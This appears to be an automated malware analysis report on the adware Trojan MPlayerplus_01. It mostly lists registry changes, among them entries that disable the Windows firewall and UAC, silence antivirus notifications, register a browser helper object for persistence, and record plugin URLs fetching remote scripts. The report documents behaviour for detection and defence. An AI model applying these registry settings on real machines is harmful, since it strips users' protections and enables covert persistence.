"a2_546" = "3914336986"
"a2_547" = "3921502540"
"a2_548" = "3928670578"
"a2_549" = "3935853188"
"a2_894" = "2114229028"
"a2_895" = "2121398384"
"a2_892" = "2099895968"
"a2_893" = "2107063035"
"a2_890" = "2085545159"
"a2_891" = "2092714022"
"a2_438" = "3140070341"
"a2_439" = "3147249469"
"a2_434" = "3111391071"
"a2_435" = "3118565545"
"a2_436" = "3125728575"
"a2_437" = "3132914197"
"a2_430" = "3082715484"
"a2_431" = "3089882210"
"a2_432" = "3097067457"
"a2_433" = "3104236944"
"a4_986" = "2773786010"
"a2_948" = "2501356747"
"a2_949" = "2508522125"
"a4_908" = "2214594572"
"a2_944" = "2472674973"
"a2_945" = "2479860457"
"a2_946" = "2487022581"
"a2_947" = "2494188532"
"a2_940" = "2444015358"
"a1_488" = "3598837643"
"a2_942" = "2458337753"
"a2_943" = "2465519199"
"a1_279" = "2521011211"
"a1_278" = "4141055257"
"a1_489" = "3229368213"
"a1_271" = "1267188980"
"a1_270" = "2073913122"
"a1_273" = "4066722233"
"a1_272" = "3370151499"
"a1_275" = "1782524004"
"a1_274" = "2818498807"
"a1_277" = "2666444460"
"a1_276" = "2974914798"
"a2_764" = "1182239251"
"a2_765" = "1189402124"
"a2_766" = "1196576057"
"a2_767" = "1203743762"
"a2_760" = "1153556075"
"a2_761" = "1160724770"
"a2_762" = "1167908253"
"a2_763" = "1175074724"
"a2_768" = "1210922634"
"a2_769" = "1218092162"
"a2_382" = "2738606545"
"a2_383" = "2745774280"
"a2_380" = "2724259299"
"a2_381" = "2731427550"
"a2_386" = "2767275061"
"a2_387" = "2774444074"
"a2_384" = "2752939567"
"a2_385" = "2760108485"
"a2_388" = "2781625609"
"a2_389" = "2788790316"
"a1_613" = "2704017407"
"a1_612" = "956973146"
"a1_611" = "1981677048"
"a2_368" = "2638238288"
"a2_369" = "2645406966"
"a1_610" = "1803759529"
"a2_88" = "630889637"
"a2_89" = "638056670"
"a2_84" = "602197076"
"a2_85" = "609382454"
"a2_86" = "616537436"
"a2_87" = "623707906"
"a2_80" = "573523498"
"a2_81" = "580705132"
"a2_82" = "587873370"
"a2_83" = "595040087"
"a3_273" = "1974165848"
"a3_272" = "1966722361"
"a3_271" = "1926113414"
"a3_270" = "1918678119"
"a3_277" = "2002712284"
"a3_276" = "1962103485"
"a3_275" = "1954659866"
"a3_274" = "1947600379"
"a2_162" = "1161404297"
"a2_163" = "1168569041"
"a3_279" = "1983582110"
"a3_278" = "2009623423"
"a2_166" = "1190071936"
"a2_167" = "1197236402"
"a2_164" = "1175737608"
"a2_165" = "1182903514"
"a3_690" = "668723035"
"a3_679" = "589715310"
"a1_666" = "2736939137"
"a3_677" = "541662892"
"a3_676" = "568228365"
"a3_675" = "560775658"
"a3_674" = "553725259"
"a3_673" = "513247528"
"a3_672" = "505681033"
"a3_671" = "532246550"
"a3_670" = "525328375"
"a3_50" = "341766363"
"a3_51" = "348755322"
"a3_52" = "389745053"
"a3_53" = "396796476"
"a3_54" = "370165343"
"a3_55" = "377748222"
"a3_56" = "384737041"
"a3_57" = "425210800"
"a3_58" = "432789459"
"a3_59" = "406145138"
"a3_417" = "3006523432"
"a3_416" = "2965403529"
"a3_415" = "2958480150"
"a3_414" = "2984984311"
"a3_413" = "2977536596"
"a3_412" = "2970543669"
"a3_411" = "2929937810"
"a3_410" = "2922490227"
"a3_419" = "2986877162"
"a3_418" = "3013512267"
"a1_451" = "768789334"
"a1_450" = "1259985985"
"a1_453" = "3787616907"
"a1_452" = "3565682170"
"a1_455" = "1463617809"
"a1_454" = "1640855387"
"a1_457" = "94119212"
"a1_456" = "1507591614"
"a1_459" = "3729966625"
"a1_458" = "1489588020"
"a1_693" = "2593998566"
"a1_692" = "1549938400"
"a1_691" = "1461325377"
"a1_690" = "2042865195"
"a1_697" = "3322133708"
"a1_696" = "2213224661"
"a1_695" = "2581710566"
"a1_694" = "1188442584"
"a1_699" = "3897448581"
"a1_698" = "663177507"
"a3_896" = "2145139113"
"a3_695" = "704178558"
"a1_962" = "4006488455"
"a3_309" = "2231976764"
"a3_308" = "2191503005"
"a3_303" = "2155521254"
"a3_302" = "2148466759"
"a3_301" = "2174512164"
"a3_300" = "2167589765"
"a3_307" = "2183924346"
"a3_306" = "2210566619"
"a3_305" = "2203581880"
"a3_304" = "2162448665"
"a4_86" = "616544406"
"a4_87" = "623713527"
"a4_84" = "602206164"
"a4_85" = "609375285"
"a4_82" = "587867922"
"a4_83" = "595037043"
"a4_80" = "573529680"
"a4_81" = "580698801"
"a3_887" = "2047190590"
"a3_730" = "921917107"
"a4_88" = "630882648"
"a4_89" = "638051769"
"a3_731" = "962513618"
"a4_954" = "2544374138"

[HKCU\Software\Aas\695404737]
"14338242" = "0"

[HKCU\Software\Aas]
"a3_913" = "2267125720"
"a3_736" = "998505673"
"a1_740" = "564684596"
"a3_737" = "1005490536"
"a3_697" = "685057584"
"a3_892" = "2083171285"
"a3_891" = "2109683634"
"a3_890" = "2102235923"
"a3_897" = "2119163336"
"a3_734" = "950445111"
"a3_895" = "2138211638"
"a3_894" = "2131222679"
"a3_899" = "2166680202"
"a3_735" = "990926934"
"a3_696" = "678137233"
"a1_967" = "2909918424"
"a4_387" = "2774449827"
"a1_940" = "124804754"
"a1_752" = "904449354"
"a4_629" = "214409813"
"a4_628" = "207240692"
"a4_627" = "200071571"
"a4_626" = "192902450"
"a4_625" = "185733329"
"a4_624" = "178564208"
"a4_623" = "171395087"
"a4_622" = "164225966"
"a4_621" = "157056845"
"a4_620" = "149887724"
"a2_75" = "537687692"
"a2_74" = "530518417"
"a2_77" = "552013932"
"a2_76" = "544854752"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas]
"a2_71" = "509004071"
"a2_70" = "501837017"
"a4_753" = "1103380817"
"a4_752" = "1096211696"
"a4_751" = "1089042575"
"a4_750" = "1081873454"
"a4_757" = "1132057301"
"a2_73" = "523339198"
"a4_755" = "1117719059"
"a4_754" = "1110549938"
"a1_877" = "2224352082"
"a1_876" = "3408463319"
"a4_759" = "1146395543"
"a2_72" = "516171632"
"a1_873" = "2942683606"
"a1_872" = "2062266677"
"a1_871" = "403968041"
"a1_870" = "278559445"
"a4_195" = "1397978595"
"a4_194" = "1390809474"
"a4_197" = "1412316837"
"a4_196" = "1405147716"
"a4_191" = "1369302111"
"a4_190" = "1362132990"
"a4_193" = "1383640353"
"a4_192" = "1376471232"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a4_198" = "1419485958"
"a1_909" = "3646407707"
"a4_179" = "1283272659"
"a4_178" = "1276103538"
"a4_173" = "1240257933"
"a4_172" = "1233088812"
"a4_171" = "1225919691"
"a4_170" = "1218750570"
"a4_177" = "1268934417"
"a4_176" = "1261765296"
"a4_175" = "1254596175"
"a4_174" = "1247427054"
"a4_577" = "4136582817"
"a3_123" = "898388146"
"a4_575" = "4122244575"
"a4_574" = "4115075454"
"a4_573" = "4107906333"
"a4_572" = "4100737212"
"a4_571" = "4093568091"
"a3_122" = "891468819"
"a4_970" = "2659080074"
"a3_121" = "850861040"
"a4_579" = "4150921059"
"a4_578" = "4143751938"
"a4_289" = "2071875969"
"a4_288" = "2064706848"
"a3_636" = "247859925"
"a3_120" = "843343697"
"a4_985" = "2766616889"
"a4_281" = "2014523001"
"a4_280" = "2007353880"
"a4_283" = "2028861243"
"a1_108" = "4204072095"
"a4_285" = "2043199485"
"a4_284" = "2036030364"
"a4_287" = "2057537727"
"a3_126" = "886312343"
"a3_125" = "879323508"
"a3_124" = "905966805"
"a4_965" = "2623234469"
"a3_691" = "642161658"
"a3_967" = "2620735566"
"a4_379" = "2717096859"
"a4_378" = "2709927738"
"a3_966" = "2647370799"
"a4_375" = "2688420375"
"a4_374" = "2681251254"
"a4_377" = "2702758617"
"a4_376" = "2695589496"
"a4_371" = "2659743891"
"a4_370" = "2652574770"
"a4_373" = "2674082133"
"a4_372" = "2666913012"
"a3_964" = "2599327597"
"a3_963" = "2592338634"
"a3_962" = "2584764075"
"a4_756" = "1124888180"
"a3_961" = "2611395080"
"a1_755" = "757558379"
"a1_437" = "3950345627"
"a3_960" = "2604335593"
"a2_553" = "3964522084"
"a2_552" = "3957353358"
"a2_551" = "3950188078"
"a2_550" = "3943019981"
"a2_557" = "3993205085"
"a2_556" = "3986038487"
"a2_555" = "3978856756"
"a2_554" = "3971686444"
"a2_889" = "2078378862"
"a2_888" = "2071211839"
"a2_559" = "4007552102"
"a2_558" = "4000372335"
"a4_980" = "2730771284"
"a4_981" = "2737940405"
"a2_429" = "3075548100"
"a2_428" = "3068380269"
"a2_427" = "3061215424"
"a2_426" = "3054047304"
"a2_425" = "3046882447"
"a2_424" = "3039715751"
"a2_423" = "3032533247"
"a2_422" = "3025360849"
"a2_421" = "3018196467"
"a2_420" = "3011032283"
"a1_758" = "1754844564"
"a2_565" = "4050558862"
"a4_984" = "2759447768"
"a2_959" = "2580225733"
"a2_958" = "2573056267"
"a2_957" = "2565875857"
"a2_956" = "2558709059"
"a2_955" = "2551541426"
"a2_954" = "2544371781"
"a1_785" = "1683585743"
"a2_952" = "2530044831"
"a2_951" = "2522872041"
"a2_950" = "2515692188"
"a1_208" = "1656467482"
"a1_209" = "4021100329"
"a1_204" = "2253572951"
"a1_205" = "3196334048"
"a1_206" = "619130488"
"a1_207" = "893248721"
"a1_200" = "3060331266"
"a1_201" = "2088473965"
"a1_202" = "2824622804"
"a1_203" = "1042089652"
"a2_777" = "1275441540"
"a2_776" = "1268277138"
"a2_775" = "1261106512"
"a2_774" = "1253924873"
"a2_773" = "1246758484"
"a2_772" = "1239591506"
"a2_771" = "1232423508"
"a2_770" = "1225260712"
"a2_779" = "1289776841"
"a2_778" = "1282610957"
"a2_395" = "2831795297"
"a2_394" = "2824625725"
"a2_397" = "2846144490"
"a2_396" = "2838978507"
"a2_391" = "2803126088"
"a2_390" = "2795948357"
"a2_393" = "2817458538"
"a2_392" = "2810283261"
"a2_399" = "2860476050"
"a2_398" = "2853312370"
"a2_568" = "4072055293"
"a2_569" = "4079223173"
"a2_379" = "2717090178"
"a2_378" = "2709919519"
"a2_373" = "2674086426"
"a2_372" = "2666906146"
"a2_371" = "2659737060"
"a2_370" = "2652572946"
"a2_377" = "2702754896"
"a2_376" = "2695590851"
"a2_375" = "2688428236"
"a2_374" = "2681256934"
"a3_246" = "1746738975"
"a3_247" = "1753789374"
"a3_244" = "1765852765"
"a3_245" = "1773304572"
"a2_179" = "1283263928"
"a2_178" = "1276105781"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_241" = "1744311672"
"a2_175" = "1254604356"
"a2_174" = "1247421497"
"a2_177" = "1268925500"
"a2_176" = "1261771010"
"a2_171" = "1225922532"
"a2_170" = "1218754415"
"a2_173" = "1240265208"
"a3_249" = "1801832560"
"a4_960" = "2587388864"
"a1_510" = "2782891625"
"a1_511" = "3422850134"
"a1_512" = "3417463123"
"a1_513" = "812705232"
"a1_514" = "782791804"
"a1_515" = "1089708398"
"a1_516" = "832078906"
"a1_517" = "960272570"
"a1_518" = "1262482227"
"a1_519" = "3564583657"
"a3_648" = "367361953"
"a3_649" = "340792256"
"a3_69" = "478110732"
"a3_68" = "470664173"
"a3_65" = "449123976"
"a3_64" = "442135145"
"a3_67" = "497168202"
"a3_66" = "489720619"
"a3_61" = "454263092"
"a3_60" = "413199509"
"a3_63" = "468244982"
"a3_62" = "461186391"
"a1_784" = "4201887253"
"a3_514" = "3667976427"
"a2_543" = "3892834562"
"a1_424" = "3960533723"
"a1_425" = "1694070208"
"a1_426" = "1031169086"
"a1_427" = "2784433783"
"a1_420" = "3457835889"
"a1_421" = "2441181395"
"a1_422" = "2734773844"
"a1_423" = "877897234"
"a3_199" = "1409969486"
"a1_428" = "508332305"
"a1_429" = "3440102361"
"a3_515" = "3709043978"
"a3_693" = "690213052"
"a2_965" = "2623240406"
"a3_338" = "2439897659"
"a3_339" = "2446886490"
"a3_336" = "2391856505"
"a3_337" = "2432846232"
"a3_334" = "2411437223"
"a3_335" = "2384801990"
"a3_332" = "2363312101"
"a3_333" = "2403923972"
"a3_330" = "2348814115"
"a3_331" = "2356388674"
"a1_738" = "2113515479"
"a1_739" = "899526229"
"a3_428" = "3084957701"
"a3_429" = "3058850980"
"a3_422" = "3041926607"
"a3_423" = "3049502318"
"a3_420" = "2994455821"
"a3_421" = "3001383340"
"a3_426" = "3070911299"
"a3_427" = "3077900258"
"a3_424" = "3022858881"
"a3_425" = "3029913376"
"a1_864" = "1298648191"
"a2_915" = "2264784744"
"a1_865" = "1336638331"
"a4_870" = "1942167974"
"a4_873" = "1963675337"
"a1_863" = "106238114"
"a3_87" = "607024862"
"a3_86" = "633131711"
"a3_85" = "626081308"
"a3_84" = "585598461"
"a3_83" = "578085210"
"a3_82" = "571034939"
"a3_81" = "597665944"
"a4_183" = "1311949143"
"a3_89" = "654610320"
"a3_88" = "614067057"
"a4_612" = "92534756"
"a4_613" = "99703877"
"a4_610" = "78196514"
"a4_611" = "85365635"
"a4_616" = "121211240"
"a4_617" = "128380361"
"a4_614" = "106872998"
"a4_615" = "114042119"
"a4_968" = "2644741832"
"a4_969" = "2651910953"
"a4_618" = "135549482"
"a4_619" = "142718603"
"a4_871" = "1949337095"
"a1_990" = "2930124718"
"a1_991" = "3206315524"
"a1_992" = "2149294888"
"a1_993" = "3140918015"
"a3_689" = "661144376"
"a3_812" = "1543047557"
"a3_692" = "649083933"
"a4_876" = "1985182700"
"a4_766" = "1196579390"
"a4_767" = "1203748511"
"a4_764" = "1182241148"
"a4_765" = "1189410269"
"a4_762" = "1167902906"
"a4_763" = "1175072027"
"a4_760" = "1153564664"
"a4_761" = "1160733785"
"a1_848" = "2776303391"
"a1_849" = "3994541413"
"a1_439" = "434358251"
"a4_768" = "1210917632"
"a4_769" = "1218086753"
"a3_938" = "2446500163"
"a3_512" = "3687557161"
"a2_662" = "450988867"
"a3_513" = "3660926024"
"a3_930" = "2355479115"
"a3_931" = "2362926826"
"a3_932" = "2403474189"
"a3_814" = "1523992135"
"a4_877" = "1992351821"
"a3_510" = "3639513879"
"a3_936" = "2398382209"
"a3_937" = "2439449888"
"a3_511" = "3679991734"
"a3_516" = "3715971501"
"a3_517" = "3723025868"
"a1_198" = "1981739218"
"a1_199" = "280983471"
"a4_148" = "1061029908"
"a4_149" = "1068199029"
"a4_146" = "1046691666"
"a4_147" = "1053860787"
"a1_196" = "1047090753"
"a4_145" = "1039522545"
"a1_190" = "3390637483"
"a4_143" = "1025184303"
"a4_140" = "1003676940"
"a4_141" = "1010846061"
"a2_983" = "2752275724"
"a3_910" = "2245638887"
"a4_548" = "3928678308"
"a4_549" = "3935847429"
"a4_542" = "3885663582"
"a4_543" = "3892832703"
"a4_540" = "3871325340"
"a4_541" = "3878494461"
"a4_546" = "3914340066"
"a4_547" = "3921509187"
"a4_544" = "3900001824"
"a4_545" = "3907170945"
"a4_839" = "1719925223"
"a1_662" = "3964198130"
"a1_663" = "1386010181"
"a3_965" = "2639793036"
"a1_660" = "2754066505"
"a4_380" = "2724265980"
"a4_381" = "2731435101"
"a4_382" = "2738604222"
"a4_383" = "2745773343"
"a4_384" = "2752942464"
"a4_385" = "2760111585"
"a4_386" = "2767280706"
"a4_169" = "1211581449"
"a4_388" = "2781618948"
"a4_389" = "2788788069"

"a1_667" = "2151300874"
"a1_664" = "1876590376"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

[HKCU\Software\Aas]
"a1_665" = "1572439772"
"a1_0" = "3585464105"
"a1_1" = "2574657836"
"a1_2" = "1517877764"
"a1_3" = "1534863684"
"a1_4" = "2284461646"
"a1_5" = "873603255"
"a1_6" = "3309449020"
"a1_7" = "580567579"
"a1_8" = "3425761333"
"a1_9" = "1293884215"
"a2_566" = "4057723868"
"a2_567" = "4064899676"
"a2_564" = "4043386927"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Aas]
"a2_562" = "4029054709"
"a2_563" = "4036222550"
"a3_8" = "40388897"
"a3_9" = "47967552"
"a3_6" = "59977839"
"a3_7" = "67032206"
"a3_4" = "11991981"
"a3_5" = "52535244"
"a3_2" = "31040235"
"a3_3" = "4933386"
"a3_0" = "17001001"
"a3_1" = "23989832"
"a2_412" = "2953679701"
"a2_413" = "2960845726"
"a2_410" = "2939344330"
"a2_411" = "2946513886"
"a2_416" = "2982349252"
"a2_417" = "2989528480"
"a2_414" = "2968013523"
"a2_415" = "2975182067"
"a2_418" = "2996695491"
"a2_419" = "3003864211"
"a2_962" = "2601724165"
"a2_963" = "2608890976"
"a2_960" = "2587393439"
"a2_961" = "2594556996"
"a2_966" = "2630406154"
"a2_967" = "2637577614"
"a2_964" = "2616058697"
"a4_950" = "2515697654"
"a1_631" = "1931423917"
"a2_968" = "2644743203"
"a2_969" = "2651909497"
"a4_564" = "4043384244"
"a1_219" = "3474215229"
"a1_218" = "2899928608"
"a1_217" = "1610887303"
"a1_216" = "3194505444"
"a1_215" = "4279908441"
"a1_214" = "3277471311"
"a1_213" = "231512426"
"a1_212" = "2658694378"
"a1_211" = "522556586"
"a1_210" = "1739335849"
"a2_988" = "2788126984"
"a2_989" = "2795302775"
"a4_567" = "4064891607"
"a1_630" = "1814769928"
"a2_980" = "2730775007"
"a4_560" = "4014707760"
"a2_982" = "2745111990"
"a4_956" = "2558712380"
"a2_984" = "2759443310"
"a2_985" = "2766611470"
"a2_986" = "2773781237"
"a4_561" = "4021876881"
"a4_562" = "4029046002"
"a3_991" = "2792683862"
"a4_563" = "4036215123"
"a4_443" = "3175920603"
"a1_633" = "4012700066"
"a4_442" = "3168751482"
"a4_441" = "3161582361"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

The process regsvr32.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\CrossriderApp0054246.Sandbox.1]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
"(Default)" = ""

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\CrossriderApp0054246.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\0\win32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "MPlayerplus_01"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CrossriderApp0054246.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"

[HKCR\CrossriderApp0054246.BHO\CurVer]
"(Default)" = "CrossriderApp0054246"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
"(Default)" = "CrossriderApp0054246.BHO.1"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0]
"(Default)" = "CrossriderApp0054246 Type Library"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}]
"(Default)" = "ISandBox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\HELPDIR]
"(Default)" = "%Program Files%\MPlayerplus_01"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
"(Default)" = "CrossriderApp0054246.Sandbox.1"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0054246.BHO]
"(Default)" = "CrossriderApp0054246"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CrossriderApp0054246.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"

[HKCR\CrossriderApp0054246.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 7A 5B 03 6F 08 2D F2 01 06 02 6B 4F 62 64 84"

[HKCR\CrossriderApp0054246.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\CrossriderApp0054246.BHO.1]
"(Default)" = "CrossriderApp0054246"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}]
"(Default)" = "ICrossriderBHO"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0054246.Sandbox]
"(Default)" = "CrossriderApp0054246.Sandbox"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "CrossriderApp0054246"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]

The process dwwin.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 82 33 8A 31 08 97 0D FF DB BB 2B F9 71 E3 4F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\MPlayerplus_01\Plugins\246]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/246.js"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/192.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"Name" = "search_engine_hook"

[HKCU\Software\MPlayerplus_01\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"Version" = "6"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/13.js"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/78.js"

